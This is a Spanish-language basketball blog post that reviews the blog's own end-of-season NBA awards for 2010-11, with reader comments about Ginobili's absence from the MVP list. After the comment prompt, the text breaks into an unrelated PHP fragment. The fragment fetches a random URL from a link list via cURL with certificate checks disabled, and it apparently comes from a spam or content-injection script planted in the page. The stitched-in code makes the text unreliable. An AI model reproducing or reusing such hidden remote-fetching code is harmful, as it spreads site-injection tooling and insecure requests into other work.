Los premios de las crónicas – Fin de temporada

06 de May de 2011 por txusma

A finales de enero hacíamos un repaso de los premios que repartíamos diariamente en nuestras crónicas. Ahora, una vez acabado la regular season y repartidos los galardones oficiales, vamos a echarles el último vistazo. De nuevo la ayuda de Rompe ha sido esencial para recopilar los premios. Desde aquí le queremos agradecer el detalle.

MVP: Derrick Rose se ha llevado el MVP de la NBA pero ha sido Lebron James el que más veces se ha llevado nuestro galardón, hasta en 18 ocasiones. En segunda posición aparece el base de los Bulls y en tercera, Dwight Howard. Sin duda, los 3 nombres que más sonaban para alzarse con el premio oficial. Dwyane Wade es el único jugador que ha aguantado el ritmo a los 3 primeros, mientras que Amare Stoudamire, que iba en cabeza en enero se ha hundido hasta la sexta plaza. Evidentemente, el traspaso de Carmelo afectó mucho en su rendimiento. Cosas curiosas: Pau Gasol ha acabado con más galardones que Kobe Bryant; Chris Paul se ha quedado con 3 premios, empatado con gente como Toney Douglas o Wesley Matheews; Luke Harangody ha ganado el premio en una ocasión, eso sí, de manera compartida. Ese día estábamos esplendidos.

Rookie: Blake Griffin se lleva de calle esta categoría, como se ha llevado el premio oficial, aunque con menos diferencia de la que podría pensarse sobre John Wall (65 contra 43). ¿Porqué? Posiblemente porque era tal su dominio que en más de una ocasión obviamos su actuación y nos centramos en el 2º mejor rookie. Por su parte, Demarcus Cousins se ha quedado relativamente cerca del base de los Wizards, confirmando que ha sido el tercer mejor rookie de la campaña. Landry Fields y Greg Monroe completan los cinco primeros. Gary Neal, en cambio, se queda por debajo de gente como Wes Johnson, Gordon Hayward o Evan Turner.

Sorpresa: Sorpresa en las sorpresas. Jordan Farmar se ha llevado hasta en 6 ocasiones el título de sorpresa de la jornada y es que, aunque lo hiciera bien, nunca hemos acabado de creérnoslo realmente. Lo gracioso es que su compañero Sasha Vujacic ha quedado en 2ª posición empatado con gente como Channing Frye, Chase Budinger, Nico Batum, Wesley Matheews o Toney Douglas. Queda claro que nadie daba un duro por la pareja de los Nets una vez fuera de los Lakers.

Decepción: Hasta 6 jugadores empatan en lo alto de nuestra clasificación. Brandon Jennings, JJ Redick, Carlos Delfino, José Calderon, Chris Bosh y OJ Mayo nos han decepcionado hasta en 5 ocasiones cada uno. Dywane Wade es el primer jugador que aparece en la lista de MVP y decepción lo que sirve de prueba de la irregular temporada del base de los Heat, sobretodo al principio de la misma. Hedo Turkoglu, Paul Pierce y Rajon Rondo también andan por ahí arriba.

Esfuerzo en vano: ¿A alguien le sorprende si decimos que este año el que más ha peleado por nada es Kevin Love? ¿Y que el segundo es Blake Griffin? Pero, ¿y si explicamos que el tercero es Dwight Howard? Ser de los primeros en este premio tiene muchas lecturas. Por un lado podemos pensar que el jugador es un crack al que no acompaña el equipo, pero también podríamos deducir que es un simple hace números cuya actuación nunca tiene un impacto real sobre el rendimiento del equipo… Carmelo, Amare, Lebron, Beasley, Wade… Vosotros diréis a cual de los 2 grupos pertenecen.

Comenta

5 comentarios a esta entrada

  1. Mariano dice:
    #1

    antes que nada, aclaro que me gusta mucho este blog y los leo todos los días..

    Pero considero que si Manu Ginobili no ha aparecido nunca en el MVP, algo están haciendo mal..

      Citar

  2. Rompe dice:
    #2

    Muy bien resumido txusma, te ha quedado muy bien. Gracias!

      Citar

  3. Viva_Dirk dice:
    #3

    Que no aparezcan en este artículo no quiere decir que no lo haya sido nunca, que igual es que no, pero creo que si,

      Citar

  4. Rompe dice:
    #4

    Ginobili ha aparecido 3 veces en el MVP a lo largo de la temporada. Es un gran jugador, que siempre suele hacer buenos números. Pero pocas veces hace numerazos…

      Citar

  5. Txusma dice:
    #5

    Ui, claro! Aparecen muchísimos nombres más en todos los grupos pero nos nos cabían todos. Manu ha tenido un año esplendido, liderando a los Spurs y ha sido el mejor de la jornada en las 3 ocasiones que dice Rompe. Estos premios dependen de muchas cosas: si tienes suerte de jugar un día que hay pocos partidos puedes ser MVP con unos números más bien normales y al contrario, hay veces que cascándote un partidazo te quedas sin premios pq alguien lo ha hecho mejor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>